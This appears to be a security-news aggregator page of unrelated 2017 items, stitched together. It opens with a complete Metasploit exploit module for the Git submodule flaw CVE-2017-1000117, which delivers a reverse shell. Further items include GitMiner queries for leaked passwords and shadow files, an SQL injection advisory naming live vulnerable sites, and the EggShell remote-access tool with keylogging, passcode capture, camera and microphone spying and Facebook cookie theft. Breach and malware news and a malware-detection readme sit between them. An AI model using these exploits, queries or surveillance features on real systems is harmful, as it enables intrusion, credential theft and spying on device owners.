Fi8sVrs

EDB-ID: 42599 Author: Metasploit Published: 2017-08-31 CVE: CVE-2017-1000117 Type: Remote Platform: Python Aliases: N/A Advisory/Source: Link Tags: Metasploit Framework E-DB Verified: Exploit: Download / View Raw Vulnerable App: N/A ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer def initialize(info = {}) super( update_info( info, 'Name' => 'Malicious Git HTTP Server For CVE-2017-1000117', 'Description' => %q( This module exploits CVE-2017-1000117, which affects Git version 2.7.5 and lower. A submodule of the form 'ssh://' can be passed parameters from the username incorrectly. This can be used to inject commands to the operating system when the submodule is cloned. This module creates a fake git repository which contains a submodule containing the vulnerability. The vulnerability is triggered when the submodules are initialised. ), 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2017-1000117'], ['URL', 'http://seclists.org/oss-sec/2017/q3/280' ] ], 'DisclosureDate' => 'Aug 10 2017', 'Targets' => [ [ 'Automatic', { 'Platform' => [ 'unix' ], 'Arch' => ARCH_CMD, 'Payload' => { 'Compat' => { 'PayloadType' => 'python' } } } ] ], 'DefaultOptions' => { 'Payload' => 'cmd/unix/reverse_python' }, 'DefaultTarget' => 0 ) ) register_options( [ OptString.new('GIT_URI', [false, 'The URI to use as the malicious Git instance (empty for random)', '']), OptString.new('GIT_SUBMODULE', [false, 'The path to use as the malicious git submodule (empty for random)', '']) ] ) end def setup @repo_data = { git: { files: {} } } setup_git super end def setup_git # URI must start with a / unless git_uri && git_uri =~ /^\// fail_with(Failure::BadConfig, 'GIT_URI must start with a /') end payload_cmd = payload.encoded + " &" payload_cmd = Rex::Text.to_hex(payload_cmd, '%') submodule_path = datastore['GIT_SUBMODULE'] if submodule_path.blank? submodule_path = Rex::Text.rand_text_alpha(rand(8) + 2).downcase end gitmodules = "[submodule \"#{submodule_path}\"] path = #{submodule_path} url = ssh://-oProxyCommand=#{payload_cmd}/ " sha1, content = build_object('blob', gitmodules) @repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content tree = "100644 .gitmodules\0#{[sha1].pack('H*')}" tree += "160000 #{submodule_path}\0#{[sha1].pack('H*')}" sha1, content = build_object('tree', tree) @repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content ## build the supposed commit that dropped this file, which has a random user/company email = Rex::Text.rand_mail_address first, last, company = email.scan(/([^\.]+)\.([^\.]+)@(.*)$/).flatten full_name = "#{first.capitalize} #{last.capitalize}" tstamp = Time.now.to_i author_time = rand(tstamp) commit_time = rand(author_time) tz_off = rand(10) commit = "author #{full_name} <#{email}> #{author_time} -0#{tz_off}00\n" \ "committer #{full_name} <#{email}> #{commit_time} -0#{tz_off}00\n" \ "\n" \ "Initial commit to open git repository for #{company}!\n" sha1, content = build_object('commit', "tree #{sha1}\n#{commit}") @repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content @repo_data[:git][:files]['/HEAD'] = "ref: refs/heads/master\n" @repo_data[:git][:files]['/info/refs'] = "#{sha1}\trefs/heads/master\n" end # Build's a Git object def build_object(type, content) # taken from http://schacon.github.io/gitbook/7_how_git_stores_objects.html header = "#{type} #{content.size}\0" store = header + content [Digest::SHA1.hexdigest(store), Zlib::Deflate.deflate(store)] end # Returns the Git object path name that a file with the provided SHA1 will reside in def get_path(sha1) sha1[0...2] + '/' + sha1[2..40] end def exploit super end def primer # add the git and mercurial URIs as necessary hardcoded_uripath(git_uri) print_status("Malicious Git URI is #{URI.parse(get_uri).merge(git_uri)}") end # handles routing any request to the mock git, mercurial or simple HTML as necessary def on_request_uri(cli, req) # if the URI is one of our repositories and the user-agent is that of git/mercurial # send back the appropriate data, otherwise just show the HTML version user_agent = req.headers['User-Agent'] if user_agent && user_agent =~ /^git\// && req.uri.start_with?(git_uri) do_git(cli, req) return end do_html(cli, req) end # simulates a Git HTTP server def do_git(cli, req) # determine if the requested file is something we know how to serve from our # fake repository and send it if so req_file = URI.parse(req.uri).path.gsub(/^#{git_uri}/, '') if @repo_data[:git][:files].key?(req_file) vprint_status("Sending Git #{req_file}") send_response(cli, @repo_data[:git][:files][req_file]) else vprint_status("Git #{req_file} doesn't exist") send_not_found(cli) end end # simulates an HTTP server with simple HTML content that lists the fake # repositories available for cloning def do_html(cli, _req) resp = create_response resp.body = <<HTML <html> <head><title>Public Repositories</title></head> <body> <p>Here are our public repositories:</p> <ul> HTML this_git_uri = URI.parse(get_uri).merge(git_uri) resp.body << "<li><a href=#{git_uri}>Git</a> (clone with `git clone #{this_git_uri}`)</li>" resp.body << <<HTML </ul> </body> </html> HTML cli.send_response(resp) end # Returns the value of GIT_URI if not blank, otherwise returns a random .git URI def git_uri return @git_uri if @git_uri if datastore['GIT_URI'].blank? @git_uri = '/' + Rex::Text.rand_text_alpha(rand(10) + 2).downcase + '.git' else @git_uri = datastore['GIT_URI'] end end end Source: https://www.exploit-db.com/exploits/42599/

This archive contains all of the 171 exploits added to Packet Storm in August, 2017. Content: adicupiddating122-sql.txt advantechsusiaccess30-traversal.rb.txt advantechsusiaccess30-upload.txt allplayer74-overflow.txt APACHE2TRIAD-SERVER-STACK-v1.5.4-MULTIPLE-CVE.txt axis2100-xss.txt backdropcms171-xss.txt bdmining10-sql.txt blackboard91-xssupload.txt bypassuac_comhijack.rb.txt clipbucket283-sqlfile.txt cmsmadesimple092-xss.txt cve_2017_8464_lnk_rce.rb.txt dbe8214-overflow.py.txt dbe8312-overflow.txt DC-2017-01-007.txt DC-2017-05-006.txt DC-2017-05-007.txt dejournalajprs10-sql.txt demystifying-kernel-exploitation.tgz detutor10-sql.txt deworkshop10-upload.txt deworkshopawp10-sql.txt digisolrom-disclose.txt diskpulse.py.txt disksorter.py.txt diskwala.py.txt dnstracer19-overflow.txt dpe10012-overflow.txt dpe9916-overflow.txt dpp10-sql.txt dse9914-overflow.txt dsscanpoc.py.txt dupscout9914-overflow.txt dupse9914-overflow.txt eadc1224-overflow.txt easydvdcreator2511-overflow.py.txt easyrmrmvbdb1811-overflow.txt ecardmax105-sql.txt edumodpro13-sql.txt edvdc2511-overflow.txt entrepreneurb2b-sql.txt evtoi1520-overflow.txt ewaadvd2311-overflow.txt fbsd-shm-hole.tgz fos10-sql.txt gifcollection20-sql.txt git_submodule_command_exec.rb.txt GS20170802005514.tgz GS20170804052733.tgz GS20170804052907.tgz GS20170810135026.txt GS20170816162136.txt GS20170816233924.txt GS20170816234127.tgz GS20170816234223.txt GS20170816234506.txt GS20170816234628.txt GS20170816235516.txt GS20170816235945.txt GS20170817000110.txt GS20170817000347.txt GS20170817000603.txt GS20170817000716.txt GS20170817000921.tgz GS20170829042636.tgz hashicorp4023-escalate.txt hexpoc.py.txt ibm_openadmin_tool_soap_welcomeserver_exec.rb.txt ibmworklight-xss.txt idm628-overflow.txt imagebay10-sql.txt ios-kernel.tgz joomlaajaxquiz18-sql.txt joomlaappointment11-sql.txt joomlacalendarplanner101-sql.txt joomlaerpc413-sql.txt joomlakissgallery100-sql.txt joomlalmskp3240-sql.txt joomlaphpbridge123-sql.txt joomlasimgenealogy215-sql.txt joomlaspmoviedatabase13-sql.txt joomlatwitchtv11-sql.txt joomlaupl102-sql.txt joomlazapcalendarlite434-sql.txt libgiglinuxsample-dos.tgz livecrm10-sql.txt liveinvoices10-sql.txt liveprojects10-sql.txt livesales10-sql.txt livesupport10-sql.txt matrimony27-xsrf.txt matrimonyscript27-sql.txt MessengerScan.py.txt minidjvu08-invalid.tgz mozff45-uaf.txt mp3wav1424-overflow.txt ms05-039scannerpoc.py.txt MS05_051_Scan_v1.0.py.txt msedgechakraint-overflow.txt msedgechakra-null.txt msedgechakra-overflow.txt mswin7sp1gdi-escalate.txt muviko10-sql.txt mvc1524-overflow.txt nitro_reader_jsapi.rb.txt noviflownivware-exec.txt nss-overflow.tgz nzedb0733-xss.txt oqp10-sql.txt PDF-XChange_Viewer_JS_API_RCE.txt philexcms02-traversal.txt photogalleryproject10-sql.txt phpcoupon6-sql.txt phpjokesite20jid-sql.txt phplance152-sql.txt phpmywind53-xss.txt phptms315-sql.txt piwigousertag090-xss.txt pluckcms474-xsrf.txt posty10-sql.txt pslt10-sql.txt qnapqsync-escalate.txt qnap_transcode_server.rb.txt qualicloudshell7-xss.txt realtimerwr3g100-xsrf.txt redgatesqlmonitor-bypass.txt rt-sa-2015-008.txt rt-sa-2015-009.txt rt-sa-2015-010.txt rt-sa-2015-011.txt SA-20170804-0.txt SA-20170804-1.txt SA-20170822-0.txt sandboxie520-dos.py.txt sbe9916-overflow.txt smbloris-dos.txt soaschoolmgmt30-sql.txt solarwindsks9616-dos.txt solconnect-sql.txt sps6-exec.txt symantecmg-exec.txt technicolortc7337-xss.txt theocms20-sql.txt tmhes-insecure.txt tngogs-sql.txt tomabomp4converter31915-dos.txt tplinktdw8901g-disclose.txt trend_micro_imsva_exec_wizard-v2.rb.txt vehicleworkshop-sqlbypass.txt vehicleworkshop-upload.txt vmware_vdp_known_privkey.rb.txt vvvsecurity-advisory-2017-6943.txt vxse10014-overflow.txt vxsearch9912-overflow.py.txt vxsearche10014-overflow.txt webfileexplorer10-download.txt wildmidi042-invalid.tgz wpfadvertisement-sql.txt wpgpegf15132-xss.txt wpsod-xss.txt xamarinstudio-escalate.txt ZSL-2017-5425.txt ZSL-2017-5426.txt ZSL-2017-5427.txt ZSL-2017-5428.txt ZSL-2017-5429.txt ZSL-2017-5430.txt ZSL-2017-5431.txt ZSL-2017-5432.txt ZSL-2017-5433.txt Downnload https://packetstormsecurity.com/files/143974/Packet-Storm-New-Exploits-For-August-2017.html

HackerOne aims to pay bug bounty hunters $100 million by 2020 https://hackerone.com/uber https://security.samsungmobile.com/rewardsProgram.smsb https://zerodium.com/tor.html - Sep. 13, 2017 - ZERODIUM, the premium zero-day acquisition platform, announces and hosts a Tor Browser Zero-Day Bounty. ZERODIUM will pay a total of one million U.S. dollars ($1,000,000) in rewards to acquire zero-day exploits for Tor Browser on Tails Linux and Windows. https://www.pornhub.com/support - Aug. 10, 2017 - Pornhub ,may provide rewards to eligible reporters of qualifying vulnerabilities. Our minimum reward is $50 USD, and our maximum rewards is $25,000 USD. Reward amounts may vary depending upon the severity of the vulnerability reported. Read more... https://www.dji.com/newsroom/news/dji-to-offer-bug-bounty-rewards-for-reporting-software-issues - Aug. 28, 2017 - DJI To Offer 'Bug Bounty' Rewards For Reporting Software Issues. Rewards for qualifying bugs will range from $100 to $30,000, depending on the potential impact of the threat. Read more.. https://security.samsungmobile.com/rewardsProgram.smsb - Nov. 29, 2017 - Under the Samsung Electronics' Mobile Security Rewards Program, security researchers can collect up to $200,000 per vulnerability, depending on severity, for any of the company's mobile devices that currently receive either monthly or quarterly security updates. Read more..

Security researchers at ESET have spotted a new cyber espionage campaign targeting embassies, consulates, and ministries worldwide. Hackers leverage a new backdoor dubbed Gazer to spy on governments and diplomats. The campaign active at least since 2016 was associated infamous Russian Turla APT group. Researchers from Kaspersky have also monitored this campaign that they called ‘Whitebear’ APT campaign. The Gazer backdoor was written in C++, hackers deliver the malicious code via spear phishing emails and compromise the targeted computers in two stages. In the first stage, the malware drops another backdoor dubbed Skipperbackdoor, then installs the Gazer malicious code. The Skipper backdoor was used by the Turla APT group in previous campaigns. While in previous campaigns, the Turla APT group leveraged Carbon and Kazuar backdoors during the second-stage of the attack, recently the group opted for the Gazer backdoor. To remain stealthy and evade detection, the threat actor leveraged compromised, legitimate websites as a proxy, most of them running WordPress CMS. Gazer’s authors heavily leverage on encryption, they are using a custom library for 3DES and RSA instead of the Windows Crypto API. The Gazer backdoor leverages code-injection technique to take control of a machine and to remain hidden for a long period of time while exfiltrating information from the targeted machine. The Gazer backdoor is also able to forward commands received by one infected endpoint to the other infected machines that share the same network. ESET malware researchers have identified four different variants of the Gazer backdoor in the wild. Earlier versions of Gazer were signed with a valid certificate issued by Comodo for “Solid Loop Ltd,” while the latest version is signed with an SSL certificate issued to “Ultimate Computer Support Ltd.” Earlier versions of the backdoor were signed with a valid certificate issued by Comodo for “Solid Loop Ltd,” while the latest version is signed with a certificate issued to “Ultimate Computer Support Ltd.” The backdoor was involved in cyber espionage operations against targets in Southeast European and former Soviet bloc. According to researchers, Gazer has already managed to infect a number of targets worldwide, with the most victims being located in Europe. Source

We’ve said it before: stop reusing passwords on different sites. Online criminals have pulled off a tried-and-true password brute-force attack against online marketplace Zazzle. On 25 August, the company notified the Office of the Attorney General in California about a security incident that might have undermined users' account security. As Zazzle explains in a breach notification letter: Those behind the attack attempted to authenticate users of the site without their authorization. They did this using password reuse attacks, or by stealing users' login credentials publicly disclosed in the Weebly, Dropbox, LinkedIn, and other "mega-breaches" of 2016 (among other security incidents) and trying them across various web services. At this time, it's unclear just how many members the attack might have affected. Zazzle's CTO Bobby Beaver estimates the attackers might have gained access to "thousands of accounts," a general figure which he says represents only "a small percentage of accounts." But even if an attacker did access their profile, Beaver wants to reassure users that they can recover from the hack using the site's password recovery mechanism. As he told ZDNet: Rather than take a chance with users' accounts, Zazzle has imposed a mandatory password reset for all members. Users should therefore choose a strong password to protect their account whenever they next visit the online marketplace. Whatever they choose should be one that they haven't used with any of their other accounts. That's not to say that Zazzle is sitting on its hands in the meantime, however. The company has implemented a CAPTCHA to prevent automated login attempts. It's also considering the activation of additional security measures. Considering the fact that the company suffered two breaches in August 2016, Zazzle should look into extra measures - such as two-step verification (2SV) security feature. If it follows that advice Zazzle's users will thank it in the long-run. Via: https://www.grahamcluley.com/zazzle-brute-force-attack/

+ Autor: Danilo Vaz a.k.a. UNK + Blog: http://unk-br.blogspot.com + Github: http://github.com/danilovazb + Twitter: https://twitter.com/danilovaz_unk WARNING +---------------------------------------------------+ | DEVELOPERS ASSUME NO LIABILITY AND ARE NOT | | RESPONSIBLE FOR ANY MISUSE OR DAMAGE CAUSED BY | | THIS PROGRAM | +---------------------------------------------------+ Description Advanced search tool and automation in Github. This tool aims to facilitate research by code or code snippets on github through the site's search page. Motivation Demonstrates the fragility of trust in public repositories to store codes with sensitive information. Requirements lxml requests Install: git clone http://github.com/danilovazb/GitMiner sudo apt-get install python-requests python-lxml OR pip install -r requirements.txt Help: usage: ██████╗ ██╗████████╗███╗ ███╗██╗███╗ ██╗███████╗██████╗ ██╔════╝ ██║╚══██╔══╝████╗ ████║██║████╗ ██║██╔════╝██╔══██╗ ██║ ███╗██║ ██║ ██╔████╔██║██║██╔██╗ ██║█████╗ ██████╔╝ ██║ ██║██║ ██║ ██║╚██╔╝██║██║██║╚██╗██║██╔══╝ ██╔══██╗ ╚██████╔╝██║ ██║ ██║ ╚═╝ ██║██║██║ ╚████║███████╗██║ ██║ ╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝╚═╝╚═╝ ╚═══╝╚══════╝╚═╝ ╚═╝ v1.1 Automatic search for GitHub. + Autor: Danilo Vaz a.k.a. UNK + Blog: http://unk-br.blogspot.com + Github: http://github.com/danilovazb + Gr33tz: l33t0s, RTFM +[WARNING]------------------------------------------+ | THIS TOOL IS THE PENALTY FOR EDUCATIONAL USE, | | THE AUTHOR IS NOT RESPONSIBLE FOR ANY DAMAGE TO | | THE TOOL THAT USE. | +---------------------------------------------------+ [-h] [-q 'filename:shadown path:etc'] [-m wordpress] [-o result.txt] optional arguments: -h, --help show this help message and exit -q 'filename:shadown path:etc', --query 'filename:shadown path:etc' Specify search term -m wordpress, --module wordpress Specify the search module -o result.txt, --output result.txt Specify the output file where it will be saved Example: Searching for wordpress configuration files with passwords: $:> python git_miner.py -q 'filename:wp-config extension:php FTP_HOST in:file ' -m wordpress -o result.txt Looking for brasilian government files containing passwords: $:> python git_miner.py --query 'extension:php "root" in:file AND "gov.br" in:file' -m senhas Looking for shadow files on the etc paste: $:> python git_miner.py --query 'filename:shadow path:etc' -m root Searching for joomla configuration files with passwords: $:> python git_miner.py --query 'filename:configuration extension:php "public password" in:file' -m joomla Hacking SSH Servers: Download: GitMiner-master.zip Source: https://github.com/UnkL4b/GitMiner

The Next Generation of Genealogy Sitebuilding versions prior to 11.1.1 suffer from a remote SQL injection vulnerability. ========================================================================================== The Next Generation of Genealogy Sitebuilding SQL Injection Vulnerability ========================================================================================== :-------------------------------------------------------------------------------------------------------------------------: : # Exploit Title : The Next Generation of Genealogy Sitebuilding SQL Injection Vulnerability : # Date : 29th August 2017 : # Author : X-Cisadane : # CMS Name : The Next Generation of Genealogy Sitebuilding : # Version : < 11.1.1 : # CMS Developer : http://www.tngsitebuilding.com/ : # Category : Web Application : # Vulnerability : SQL Injection : # Tested On : SQLMap 1.1.8.16#dev (Windows 7 64-bit) : # Greetz to : X-Code YogyaFree, ExploreCrew, CodeNesia, Bogor Hackers Community, Borneo Crew, Depok Cyber, Mantan :-------------------------------------------------------------------------------------------------------------------------: A SQL Injection Vulnerability has been discovered in the The Next Generation of Genealogy Sitebuilding CMS. The vulnerability allows remote attackers to execute own SQL Commands by usage of a vulnerable serivce value. The vulnerability is located in the primaryID value of the timeline2.php file. Remote attackers are able to execute own SQL Commands by usage of a GET method request with manipulated primaryID value. Remote attackers are able to read database information by execution of own SQL Commands. DORKS (How to find the target) : ================================ inurl:/timeline2.php?primaryID= Or "powered by The Next Generation of Genealogy Sitebuilding" Or use your own Google Dorks :) Proof of Concept ================ SQL Injection PoC : http://[Site]/[Path]/timeline2.php?primaryID=['SQLi] Screenshot (PoC) : https://s20.postimg.org/asdu29rwt/Screenshot_99.png https://s20.postimg.org/wsu6iwakt/Screenshot_100.png Example of Vuln Sites : http://1820settlers.co.uk/genealogy/timeline2.php?primaryID=['SQLi] http://lythgoes.net/genealogy/timeline2.php?primaryID=['SQLi] http://henrygrowfamily.org/timeline2.php?primaryID=['SQLi] http://www.ennever.com/timeline2.php?primaryID=['SQLi] http://mcbridehistory.com/timeline2.php?primaryID=['SQLi] ... etc ... Source: https://packetstormsecurity.com/files/143954/The-Next-Generation-Of-Genealogy-Sitebuilding-SQL-Injection.html

BinaryAlert: Serverless, Real-time & Retroactive Malware Detection BinaryAlert is an open-source serverless AWS pipeline where any file uploaded to an S3 bucket is immediately scanned with a configurable set of YARA rules. An alert will fire as soon as any match is found, giving an incident response team the ability to quickly contain the threat before it spreads. Features: Built with Amazon Web Services (AWS): An AWS account is all you need to deploy BinaryAlert. Broad YARA Support: Add your own YARA rules and/or automatically clone them from third-party repos. PE, math, and hash YARA modules are supported. Real-Time: Files uploaded to BinaryAlert (S3 bucket) are immediately queued for analysis. Serverless: All computation is handled by Lambda functions. No servers to manage means stronger security and automatic scaling! Infrastructure-as-Code: The entire infrastructure is described with Terraform configuration files, enabling anyone to deploy BinaryAlert in a matter of minutes with a single command. Retroactive Analysis: After updating the YARA ruleset, BinaryAlert will retroactively scan the entire file corpus to find any new matches. Easily Configurable: BinaryAlert configuration is managed in a single Terraform variables file. Quality Code: Written in Python3 with unit tests and linting to ensure a clean and reliable codebase. Low Cost: The AWS bill is based only on how many files are analyzed. Quick Start: Install dependencies Install Python3.6, pip3, virtualenv, and Terraform. Create a virtual environment: virtualenv -p python3 venv Activate the virtual env: source venv/bin/activate Install third-party libraries: pip3 install -r requirements.txt If the installation encounters problems finding openssl.h, try export CFLAGS='-I/usr/local/opt/openssl/include' before the install. Configure settings Set your AWS credentials using any method supported by Terraform. The two simplest options are to run aws configure (saves ~/.aws/credentials file) or export AWS_DEFAULT_REGION="region-name" export AWS_ACCESS_KEY_ID="access-key" export AWS_SECRET_ACCESS_KEY="secret-key" Fill out the base configuration options in terraform.tfvars Deploy: python3 manage.py deploy In order to receive YARA match alerts, you must manually subscribe to the generated SNS topics. Go to the SNS console and add a subscription to the *_binaryalert_yara_match_alerts topic (which receives YARA match alerts) and the *_binaryalert_metric_alarms topic (which receives CloudWatch alerts if the service is down). SNS supports a variety of subscription endpoints, including email and SMS. SNS subscriptions must be confirmed by the destination, which is why this step can't be automated by Terraform. That's it! Now any file you upload to the BinaryAlert S3 bucket will automatically trigger YARA analysis and you can rest easier knowing that your files are safe. CLI Tool: manage.py: For simplicity, BinaryAlert management commands are bundled together in manage.py. Usage: python3 manage.py [--help] [command] YARA RULES: YARA rules are stored in the rules/ folder. See rules/README.md for more information about adding and updating YARA rules. Architecture: The organization collects files and delivers them to their BinaryAlert S3 bucket. Files of interest could include executable binaries, email attachments, documents, etc. Every file uploaded to the S3 bucket is immediately queued for analysis. A dispatching Lambda function runs every minute, grouping files into batches and invoking up to dozens of analyzers in parallel. Each analyzer scans its files using a list of pre-compiled YARA rules. YARA matches are saved to DynamoDB and an alert is sent to an SNS topic. We use StreamAlert to dispatch these alerts, but other organizations can instead consume the alerts via email or any other supported SNS subscription. For retroactive analysis, a batching Lambda function enqueues the entire S3 bucket to be re-analyzed. Configurable CloudWatch alarms will trigger if any BinaryAlert component is behaving abnormally. This will notify a different SNS topic than the one used for YARA match alerts. Updating Pip Packages: The exact pip3 package versions used are frozen in requirements.txt. However, to make upgrading packages easier, requirements_top_level.txt contains only the top-level packages required by BinaryAlert. To upgrade the package requirements, pip3 install -r requirements_top_level.txt --upgrade pip3 freeze > requirements.txt Directory Overview: lambda_functions: Source code for each BinaryAlert Lambda function. rules: Collection of public and private YARA rules. terraform: AWS infrastructure represented as Terraform configuration files. tests: Unit tests amd mocks. Links: Announcement Post Twitter (unofficial) Slack (unofficial) Download binaryalert-master.zip Source: https://github.com/airbnb/binaryalert

If you came across any Facebook message with a video link sent by anyone, even your friend — just don’t click on it. Security researchers at Kaspersky Lab have spotted an ongoing cross-platform campaign on Facebook Messenger, where users receive a video link that redirects them to a fake website, luring them to install malicious software. Although it is still unclear how the malware spreads, researchers believe spammers are using compromised accounts, hijacked browsers, or clickjacking techniques to spread the malicious link. The attackers make use of social engineering to trick users into clicking the video link, which purports to be from one of their Facebook friends, with the message that reads "< your friend name > Video" followed by a bit.ly link, as shown. Here's How this Cross-Platform Malware Works: The URL redirects victims to a Google doc that displays a dynamically generated video thumbnail, like a playable movie, based on the sender's images, which if clicked, further redirects users to another customised landing page depending upon their browser and operating system. For example, Mozilla Firefox users on Windows are redirected to a website displaying a fake Flash Player Update notice, and then offered a Windows executable, which is flagged as adware software. Google Chrome users are redirected to a website that masquerades as YouTube with similar YouTube logo, which displays a fake error message popup, tricking victims into downloading a malicious Chrome extension from the Google Web Store. The extension actually is a downloader that downloads a file of attacker's choice to the victim's computer. Users of Apple Mac OS X Safari ends up on a web page similar to when using Firefox, but it was customised for MacOS users with a fake update for Flash Media Player, which if clicked, downloads an OSX executable .dmg file, which is also adware. Same in case of Linux, user redirects to another landing page designed for Linux users. The attackers behind the campaign are not actually infecting users of all platform with any banking Trojan or exploit kits, but with adware to make a lot of money by generating revenue from ads. Spam campaigns on Facebook are quite common. A few years ago, researchers found cyber criminals using boobytrapped .JPG image files to hide their malware in order to infect Facebook users with variants of the Locky ransomware, which encrypts all files on the infected PC until a ransom is paid. To keep yourself safe, you are advised not to get curious to look at images or video links sent by anyone, even your friend, without verifying it with them, and always keep your antivirus software up-to-date. Via https://thehackernews.com/2017/08/facebook-virus-hacking.html

ZERODIUM pays premium bounties and rewards to security researchers to acquire their original and previously unreported zero-day research affecting major operating systems, software, and devices. While the majority of existing bug bounty programs accept almost any kind of vulnerabilities and PoCs but pay very low rewards, at ZERODIUM we focus on high-risk vulnerabilities with fully functional exploits, and we pay the highest rewards on the market. ZERODIUM is currently acquiring zero-day exploits affecting the following products: https://zerodium.com/program.html

Security researchers are warning of a new, easy-to-exploit email trick that could allow an attacker to turn a seemingly benign email into a malicious one after it has already been delivered to your email inbox. Dubbed Ropemaker (stands for Remotely Originated Post-delivery Email Manipulation Attacks Keeping Email Risky), the trick was uncovered by Francisco Ribeiro, the researcher at email and cloud security firm Mimecast. A successful exploitation of the Ropemaker attack could allow an attacker to remotely modify the content of an email sent by the attacker itself, for example swapping a URL with the malicious one. This can be done even after the email has already been delivered to the recipient and made it through all the necessary spam and security filters, without requiring direct access to the recipient’s computer or email application, exposing hundreds of millions of desktop email client users to malicious attacks. Ropemaker abuses Cascading Style Sheets (CSS) and Hypertext Markup Language (HTML) that are fundamental parts of the way information is presented on the Internet. Since CSS is stored remotely, researchers say an attacker can change the content of an email through remotely initiated changes made to the desired 'style' of the email that is then retrieved remotely and presented to the user, without the recipient, even tech savvy users, knowing about it. According to the researchers, the Ropemaker attack could be leveraged depending upon the creativity of the threat actors. For instance, attackers could replace a URL that originally directed the user to a legitimate website by a malicious one that sends the user to a compromised site designed to infect users with malware or steal sensitive info, such as their credentials and banking details. While some systems are designed to detect the URL switch preventing users from opening up the malicious link, other users could be left at a security risk. Another attack scenario, called "Matrix Exploit" by the Mimecast, is more sophisticated than the "Switch Exploit", and therefore much harder to detect and defend against. In a Matrix Exploit attack, attackers would write a matrix of text in an email and then use the remote CSS to selectively control what is displayed, allowing the attacker to display whatever they want—including adding malicious URLs into the body of the email. This attack is harder to defend against because the initial email received by the user does not display any URL, most software systems will not flag the message as malicious. Although the security firm has not detected the Ropemaker attack in the wild, it believes that this doesn't mean for sure the attack is "not being used somewhere outside the view of Mimecast." According to the security firm, Ropemaker could be used by hackers to bypass most common security systems and trick even the tech savvy users into interacting with a malicious URL. To protect themselves from such attacks, users are recommended to rely on web-based email clients like Gmail, iCloud and Outlook, which aren't affected by Ropemaker-style CSS exploits, according to Mimecast. However, email clients like the desktop and mobile version of Apple Mail, Microsoft Outlook, and Mozilla Thunderbird are all vulnerable to the Ropemaker attack. Via https://thehackernews.com/2017/08/change-email-content.html

Brief Overview EggShell (formerly NeonEggShell) was a project I started in August of 2015. It is a remote control pentest tool written in python. After trying out Metasploits “Meterpreter”, I decided to create a better, native, secure, and easier tool with most, if not more commands for macOS And Jailbroken iOS Devices. This tool creates a bash payload what spawns a command line session with the target including extra functionality like downloading files, taking pictures, location tracking, and dozens of other commands. EggShell also has the functionality to handle and switch between multiple targets. Communication between server and target is encrypted with AES Encrypted Communication All data sent between the server and target are encrypted with 128 bit AES. This means files, pictures, and commands are encrypted end to end. The server and the payload each have a shared key that is used to encrypt the random AES key that is used for communication. The random AES key is generated each time the server script is started. Getting Started To use EggShell, you must have pycrypto and Python 2.7.x installed Install using git: (macOS/Linux) git clone https://github.com/neoneggplant/EggShell cd EggShell python eggshell.py Create And Run A Payload Using the menu, we can choose to create a bash payload, this is what will be run on the target machine. It is a 2 stage payload, it will connect to our eggshell server, download a shell script and tell our server what device it is, and then finally connect back one more time to download and execute the binary. Example: running the created payload on our target Back on our server, we can see we received a connection and an eggshell session has been started! macOS Commands ls : list contents of directory cd : change directories rm : delete file pwd : get current directory download : download file picture : take picture through iSight camera getpid : get process id openurl : open url through the default browser idletime : get the amount of time since the keyboard/cursor were touched getpaste : get pasteboard contents mic : record microphone brightness : adjust screen brightness exec : execute command persistence : attempts to connect back every 60 seconds rmpersistence : removes persistence iOS Commands sysinfo : get system information ls : list contents of directory cd : change directories rm : delete file pwd : get current directory download : download file frontcam : take picture through front camera backcam : take picture through back camera mic : record microphone getpid : get process id vibrate : make device vibrate alert : make alert show up on device say : make device speak locate : get device location respring : respring device setvol : set mediaplayer volume getvol : view mediaplayer volume isplaying : view mediaplayer info openurl : open url on device dial : dial number on device battery : get battery level listapps : list bundle identifiers open : open app persistence : installs LaunchDaemon – tries to connect every 30 seconds rmpersistence : uninstalls LaunchDaemon installpro : installs eggshellpro to device EggShellPro Commands (Cydia Substrate Extension) lock : simulate lock button press wake : wake device from sleeping state home : simulate home button press doublehome : simulate home button double press play : plays music pause : pause music next : next track prev : previous track getpasscode : log successfull passcode attempts unlock : unlock with passcode keylog : log keystrokes keylogclear : clear keylog data locationservice: turn on or off location services EggShell Pro EggShell Pro is a Cydia substrate library that takes advantage of the the system functions in iOS. With this extension, we can perform home button actions, simulate the lock button, toggle location services, and more. Another feature is being able to log the passcode that the iPhone has used to be unlocked with. When interacting with an iOS Device, simply run “installpro” and the dylib file will upload to the device followed by a respring. Navigating/Downloading Files EggShell has a command line interface like feel to it. Using the unix like commands built into eggshell, we can print working directory (pwd), directory listing (ls), remove files (rm), and change directories (cd). Using these commands we can easily navigate the file system just like the command line. Using the download command we can download any file securely over our encrypted connection. In the example below, we go through a directory and download a pdf file on the target machine. Taking Pictures Taking a photo with the “picture” command on macOS will active the iSight camera and send the image data back to the server. To take a picture on iOS use the “frontcam” or “backcam” iOS Location Tracking Even With Location Services Off EggShellPro lets us send commands to toggle location services on or off. This means even if location services are off, we can turn them on, retrieve the location of the device, and then quickly turn location services off. We get location coordinates of the exact spot the device is currently in and also a convenient link to google maps. iOS Getting Passcode EggshellPro hooks into lock screen functions and logs any success the devices passcode in memory. When we run “getpasscode” we are sent back the passcode that was used last to unlock the device. macOS Hijacking Safari Facebook Sessions With the command getfacebook, there is a special function in eggshell that parses through binary cookies from safari. Due to safari binary cookies being unencrypted, we can easily leak the Facebook c_user and xs cookies and use it to login on another browser. macOS Persistence To achieve persistence, even without being root, the command “persistence” adds the payload to the crontab file. It attempts to re-connect every 60 seconds even after a reboot. To remove persistence, simply enter “rmpersistence” and it should remove itself from crontab. Recording Audio Using the “mic record” command, we can asynchronously record audio on both iOS and macOS. This means we can record through the mic while running other commands. When we are finished recording, simply run “mic stop”, this will stop the recording of audio and download the audio data. Handling Multiple Sessions With the built in feature “MultiServer”, we can listen for multiple connections. Below is an example with 2 connections on the same device, however this can be done with multiple devices. As we connect to targets, we can use “sessions” to list all the active sessions, “interact” to interact with a session, “close” session numbers, and “back” to go back to the multiserver console Payloads In Apps Payloads can easily be added inside of apps. Below is an example of using the “system()” function to call our payload, still in just one line! This method can be used on both macOS and jailbroken iOS Immediately after running the app, our payload is run and just as expected, we have a connection Safari Exploit + EggShell Soon after iOS security researcher Luca Todesco released his browser based 